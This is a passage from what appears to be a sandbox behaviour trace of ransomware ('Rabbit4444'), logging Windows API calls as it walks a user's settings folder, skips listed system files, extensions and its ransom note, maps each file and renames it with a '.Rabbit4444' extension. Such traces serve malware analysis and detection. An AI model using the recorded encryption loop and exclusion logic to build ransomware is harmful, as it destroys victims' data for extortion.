(lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F96E2F30-2018-4F0E-BBEE-7CCBEE8CE714}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f96e2f30-2018-4f0e-bbee-7ccbee8ce714}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{F96E2F30-2018-4F0E-BBEE-7CCBEE8CE714}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{f96e2f30-2018-4f0e-bbee-7ccbee8ce714}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.764] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57b46320, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x57b46320, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23183f67, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{FADA4BFB-4853-4547-B70F-1B565E7D907B}.settingcontent-ms", cAlternateFileName="CLA328~1.SET")) returned 1 [0059.764] lstrcmpiW (lpString1="Classic_{FADA4BFB-4853-4547-B70F-1B565E7D907B}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.765] lstrcmpiW (lpString1="Classic_{FADA4BFB-4853-4547-B70F-1B565E7D907B}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.765] lstrcmpiW (lpString1="Classic_{FADA4BFB-4853-4547-B70F-1B565E7D907B}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.765] lstrcmpiW (lpString1="Classic_{FADA4BFB-4853-4547-B70F-1B565E7D907B}.settingcontent-ms", lpString2=".") returned 1 [0059.765] lstrcmpiW (lpString1="Classic_{FADA4BFB-4853-4547-B70F-1B565E7D907B}.settingcontent-ms", lpString2="..") returned 1 [0059.765] lstrcmpiW (lpString1="Classic_{FADA4BFB-4853-4547-B70F-1B565E7D907B}.settingcontent-ms", lpString2="windows") returned -1 [0059.765] lstrcmpiW (lpString1="Classic_{FADA4BFB-4853-4547-B70F-1B565E7D907B}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.765] lstrcmpiW (lpString1="Classic_{FADA4BFB-4853-4547-B70F-1B565E7D907B}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.765] lstrcmpiW (lpString1="Classic_{FADA4BFB-4853-4547-B70F-1B565E7D907B}.settingcontent-ms", lpString2="boot") returned 1 [0059.765] lstrcmpiW (lpString1="Classic_{FADA4BFB-4853-4547-B70F-1B565E7D907B}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.765] lstrcmpiW (lpString1="Classic_{FADA4BFB-4853-4547-B70F-1B565E7D907B}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.765] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{FADA4BFB-4853-4547-B70F-1B565E7D907B}.settingcontent-ms" | out: lpString1="Classic_{FADA4BFB-4853-4547-B70F-1B565E7D907B}.settingcontent-ms") returned="Classic_{FADA4BFB-4853-4547-B70F-1B565E7D907B}.settingcontent-ms" [0059.765] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FADA4BFB-4853-4547-B70F-1B565E7D907B}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.765] lstrlenW (lpString="Classic_{FADA4BFB-4853-4547-B70F-1B565E7D907B}.settingcontent-ms") returned 64 [0059.765] lstrlenW (lpString="Rabbit4444") returned 10 [0059.765] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.765] lstrlenW (lpString=".dll") returned 4 [0059.765] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.765] lstrlenW (lpString=".lnk") returned 4 [0059.765] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.765] lstrlenW (lpString=".ini") returned 4 [0059.765] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.765] lstrlenW (lpString=".sys") returned 4 [0059.765] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.765] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FADA4BFB-4853-4547-B70F-1B565E7D907B}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{fada4bfb-4853-4547-b70f-1b565e7d907b}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.766] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.766] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15107650369) returned 1 [0059.766] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=938) returned 1 [0059.766] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0059.766] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101b78 [0059.766] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6b0, lpName=0x0) returned 0x298 [0059.768] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6b0) returned 0x70000 [0059.769] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.769] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0059.769] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.769] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0059.769] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.769] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0059.769] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.769] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0059.769] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15108001321) returned 1 [0059.769] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0059.769] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101b78 | out: hHeap=0xe0000) returned 1 [0059.769] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.769] CloseHandle (hObject=0x298) returned 1 [0059.770] CloseHandle (hObject=0x278) returned 1 [0059.770] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FADA4BFB-4853-4547-B70F-1B565E7D907B}.settingcontent-ms.Rabbit4444") returned 192 [0059.770] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FADA4BFB-4853-4547-B70F-1B565E7D907B}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{fada4bfb-4853-4547-b70f-1b565e7d907b}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FADA4BFB-4853-4547-B70F-1B565E7D907B}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{fada4bfb-4853-4547-b70f-1b565e7d907b}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.770] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57bdec8b, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x57bdec8b, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x23183f67, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x47c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{FD4FB8FA-F752-4E78-933B-8969E18BC9B5}.settingcontent-ms", cAlternateFileName="CLB103~1.SET")) returned 1 [0059.770] lstrcmpiW (lpString1="Classic_{FD4FB8FA-F752-4E78-933B-8969E18BC9B5}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.770] lstrcmpiW (lpString1="Classic_{FD4FB8FA-F752-4E78-933B-8969E18BC9B5}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.770] lstrcmpiW (lpString1="Classic_{FD4FB8FA-F752-4E78-933B-8969E18BC9B5}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.770] lstrcmpiW (lpString1="Classic_{FD4FB8FA-F752-4E78-933B-8969E18BC9B5}.settingcontent-ms", lpString2=".") returned 1 [0059.771] lstrcmpiW (lpString1="Classic_{FD4FB8FA-F752-4E78-933B-8969E18BC9B5}.settingcontent-ms", lpString2="..") returned 1 [0059.771] lstrcmpiW (lpString1="Classic_{FD4FB8FA-F752-4E78-933B-8969E18BC9B5}.settingcontent-ms", lpString2="windows") returned -1 [0059.771] lstrcmpiW (lpString1="Classic_{FD4FB8FA-F752-4E78-933B-8969E18BC9B5}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.771] lstrcmpiW (lpString1="Classic_{FD4FB8FA-F752-4E78-933B-8969E18BC9B5}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.771] lstrcmpiW (lpString1="Classic_{FD4FB8FA-F752-4E78-933B-8969E18BC9B5}.settingcontent-ms", lpString2="boot") returned 1 [0059.771] lstrcmpiW (lpString1="Classic_{FD4FB8FA-F752-4E78-933B-8969E18BC9B5}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.771] lstrcmpiW (lpString1="Classic_{FD4FB8FA-F752-4E78-933B-8969E18BC9B5}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.771] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{FD4FB8FA-F752-4E78-933B-8969E18BC9B5}.settingcontent-ms" | out: lpString1="Classic_{FD4FB8FA-F752-4E78-933B-8969E18BC9B5}.settingcontent-ms") returned="Classic_{FD4FB8FA-F752-4E78-933B-8969E18BC9B5}.settingcontent-ms" [0059.771] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FD4FB8FA-F752-4E78-933B-8969E18BC9B5}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.771] lstrlenW (lpString="Classic_{FD4FB8FA-F752-4E78-933B-8969E18BC9B5}.settingcontent-ms") returned 64 [0059.771] lstrlenW (lpString="Rabbit4444") returned 10 [0059.771] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.771] lstrlenW (lpString=".dll") returned 4 [0059.771] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.771] lstrlenW (lpString=".lnk") returned 4 [0059.771] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.771] lstrlenW (lpString=".ini") returned 4 [0059.771] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.771] lstrlenW (lpString=".sys") returned 4 [0059.771] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.771] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FD4FB8FA-F752-4E78-933B-8969E18BC9B5}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{fd4fb8fa-f752-4e78-933b-8969e18bc9b5}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.772] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.772] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15108234793) returned 1 [0059.772] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1148) returned 1 [0059.772] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1179c8 [0059.772] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101af0 [0059.772] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x780, lpName=0x0) returned 0x298 [0059.773] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x780) returned 0x70000 [0059.774] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.774] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0059.774] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.774] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0059.774] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.774] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0059.774] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.774] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0059.774] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15108485036) returned 1 [0059.774] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1179c8 | out: hHeap=0xe0000) returned 1 [0059.774] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101af0 | out: hHeap=0xe0000) returned 1 [0059.774] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.774] CloseHandle (hObject=0x298) returned 1 [0059.774] CloseHandle (hObject=0x278) returned 1 [0059.774] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FD4FB8FA-F752-4E78-933B-8969E18BC9B5}.settingcontent-ms.Rabbit4444") returned 192 [0059.774] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FD4FB8FA-F752-4E78-933B-8969E18BC9B5}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{fd4fb8fa-f752-4e78-933b-8969e18bc9b5}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FD4FB8FA-F752-4E78-933B-8969E18BC9B5}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{fd4fb8fa-f752-4e78-933b-8969e18bc9b5}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.775] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57c775f7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x57c775f7, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x231d0415, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3d7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{FE777427-D33C-485B-A414-3BD5A2943162}.settingcontent-ms", cAlternateFileName="CLA7D8~1.SET")) returned 1 [0059.775] lstrcmpiW (lpString1="Classic_{FE777427-D33C-485B-A414-3BD5A2943162}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.775] lstrcmpiW (lpString1="Classic_{FE777427-D33C-485B-A414-3BD5A2943162}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.775] lstrcmpiW (lpString1="Classic_{FE777427-D33C-485B-A414-3BD5A2943162}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.775] lstrcmpiW (lpString1="Classic_{FE777427-D33C-485B-A414-3BD5A2943162}.settingcontent-ms", lpString2=".") returned 1 [0059.775] lstrcmpiW (lpString1="Classic_{FE777427-D33C-485B-A414-3BD5A2943162}.settingcontent-ms", lpString2="..") returned 1 [0059.775] lstrcmpiW (lpString1="Classic_{FE777427-D33C-485B-A414-3BD5A2943162}.settingcontent-ms", lpString2="windows") returned -1 [0059.775] lstrcmpiW (lpString1="Classic_{FE777427-D33C-485B-A414-3BD5A2943162}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.776] lstrcmpiW (lpString1="Classic_{FE777427-D33C-485B-A414-3BD5A2943162}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.776] lstrcmpiW (lpString1="Classic_{FE777427-D33C-485B-A414-3BD5A2943162}.settingcontent-ms", lpString2="boot") returned 1 [0059.776] lstrcmpiW (lpString1="Classic_{FE777427-D33C-485B-A414-3BD5A2943162}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.776] lstrcmpiW (lpString1="Classic_{FE777427-D33C-485B-A414-3BD5A2943162}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.776] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{FE777427-D33C-485B-A414-3BD5A2943162}.settingcontent-ms" | out: lpString1="Classic_{FE777427-D33C-485B-A414-3BD5A2943162}.settingcontent-ms") returned="Classic_{FE777427-D33C-485B-A414-3BD5A2943162}.settingcontent-ms" [0059.776] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FE777427-D33C-485B-A414-3BD5A2943162}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.776] lstrlenW (lpString="Classic_{FE777427-D33C-485B-A414-3BD5A2943162}.settingcontent-ms") returned 64 [0059.776] lstrlenW (lpString="Rabbit4444") returned 10 [0059.776] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.776] lstrlenW (lpString=".dll") returned 4 [0059.776] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.776] lstrlenW (lpString=".lnk") returned 4 [0059.776] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.776] lstrlenW (lpString=".ini") returned 4 [0059.776] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.776] lstrlenW (lpString=".sys") returned 4 [0059.776] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.776] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FE777427-D33C-485B-A414-3BD5A2943162}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{fe777427-d33c-485b-a414-3bd5a2943162}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.776] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.776] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15108722553) returned 1 [0059.777] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=983) returned 1 [0059.777] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0059.777] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1019e0 [0059.777] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6e0, lpName=0x0) returned 0x298 [0059.778] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6e0) returned 0x70000 [0059.779] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.779] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0059.779] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.779] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0059.779] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.779] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0059.779] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.779] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0059.779] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15109019840) returned 1 [0059.780] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0059.780] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1019e0 | out: hHeap=0xe0000) returned 1 [0059.780] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.780] CloseHandle (hObject=0x298) returned 1 [0059.780] CloseHandle (hObject=0x278) returned 1 [0059.780] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FE777427-D33C-485B-A414-3BD5A2943162}.settingcontent-ms.Rabbit4444") returned 192 [0059.780] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FE777427-D33C-485B-A414-3BD5A2943162}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{fe777427-d33c-485b-a414-3bd5a2943162}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{FE777427-D33C-485B-A414-3BD5A2943162}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{fe777427-d33c-485b-a414-3bd5a2943162}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.781] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57d0ff62, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x57d0ff62, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x224ffa05, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x408, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{FEBB9292-6110-4B9E-8565-91C4076E0A43}.settingcontent-ms", cAlternateFileName="CLD846~1.SET")) returned 1 [0059.781] lstrcmpiW (lpString1="Classic_{FEBB9292-6110-4B9E-8565-91C4076E0A43}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.781] lstrcmpiW (lpString1="Classic_{FEBB9292-6110-4B9E-8565-91C4076E0A43}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.781] lstrcmpiW (lpString1="Classic_{FEBB9292-6110-4B9E-8565-91C4076E0A43}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.781] lstrcmpiW (lpString1="Classic_{FEBB9292-6110-4B9E-8565-91C4076E0A43}.settingcontent-ms", lpString2=".") returned 1 [0059.781] lstrcmpiW (lpString1="Classic_{FEBB9292-6110-4B9E-8565-91C4076E0A43}.settingcontent-ms", lpString2="..") returned 1 [0059.781] lstrcmpiW (lpString1="Classic_{FEBB9292-6110-4B9E-8565-91C4076E0A43}.settingcontent-ms", lpString2="windows") returned -1 [0059.781] lstrcmpiW (lpString1="Classic_{FEBB9292-6110-4B9E-8565-91C4076E0A43}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.781] lstrcmpiW (lpString1="Classic_{FEBB9292-6110-4B9E-8565-91C4076E0A43}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.781] lstrcmpiW (lpString1="Classic_{FEBB9292-6110-4B9E-8565-91C4076E0A43}.settingcontent-ms", lpString2="boot") returned 1 [0059.781] lstrcmpiW (lpString1="Classic_{FEBB9292-6110-4B9E-8565-91C4076E0A43}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.781] lstrcmpiW (lpString1="Classic_{FEBB9292-6110-4B9E-8565-91C4076E0A43}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.781] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{FEBB9292-6110-4B9E-8565-91C4076E0A43}.settingcontent-ms" | out: lpString1="Classic_{FEBB9292-6110-4B9E-8565-91C4076E0A43}.settingcontent-ms") returned="Classic_{FEBB9292-6110-4B9E-8565-91C4076E0A43}.settingcontent-ms" [0059.781] SetFileAttributesW 